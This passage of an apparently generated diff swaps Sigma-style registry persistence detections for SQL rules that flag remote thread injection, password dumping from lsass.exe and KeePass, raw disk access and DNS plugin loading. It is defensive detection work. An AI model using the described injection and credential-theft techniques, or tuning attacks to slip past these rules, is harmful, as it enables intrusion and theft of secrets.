"Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", - "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Potential Persistence Via Shim Database Modification", - "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", - "status": "experimental", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", - "author": "frack113", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1546.011" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (NewValue = ''))" + "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_persistence_shim_databases.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "Disable Exploit Guard Network Protection on Windows Defender", - "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", - "status": "experimental", - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "author": "Austin Songer @austinsonger", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "status": "test", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND NewValue = 'DWORD (00000001)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Persistence Via Disk Cleanup Handler - Autorun", - "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (NewValue LIKE '%cmd%' ESCAPE '\\' OR NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%wsl%' ESCAPE '\\' OR NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", - "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "Windows Defender Exclusions Added - Registry", - "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "status": "test", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], + "title": "Suspicious Remote Thread Target", + "id": "f016c716-754a-467f-a39e-63c06f773987", + "status": "experimental", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrator actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" ], - "filename": "registry_set_defender_exclusions.yml" + "filename": "create_remote_thread_win_susp_remote_thread_target.yml" }, { - "title": "CurrentControlSet Autorun Keys Modification", - "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation Via PowerShell", + "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "status": "test", + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR NewValue LIKE 'CutePDF Writer' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND NewValue = 'VNCpm.dll')))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" + "filename": "create_remote_thread_win_powershell_crt.yml" }, { - "title": "Persistence Via New SIP Provider", - "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", - "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", + "id": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "status": "test", + "description": "Detects raw disk access using uncommon tools, which could indicate possible defense evasion attempts", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1553.003" + "attack.t1006" ], "falsepositives": [ - "Legitimate SIP being registered by the OS or different software." + "Legitimate Administrator using tool for raw access or ongoing forensic investigation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((NewValue IN ('WINTRUST.DLL', 'mso.dll')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE NOT ((Device LIKE '%floppy%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\uus\\\\%' ESCAPE '\\')) OR (ProcessId = '4') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName IN ('System', 'Registry')) OR (NewProcessName LIKE '%\\\\Keybase\\\\upd.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SystemApps\\\\Microsoft.Windows.StartMenuExperienceHost%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\StartMenuExperienceHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\WindowsUpdateBox.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\resources\\\\app\\\\git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\HostMetadata\\\\NVMEHostmetadata.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Executables\\\\SSDUpdate.exe' ESCAPE '\\')))" ], - "filename": "registry_set_sip_persistence.yml" + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml" }, { - "title": "Internet Explorer Autorun Keys Modification", - "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR 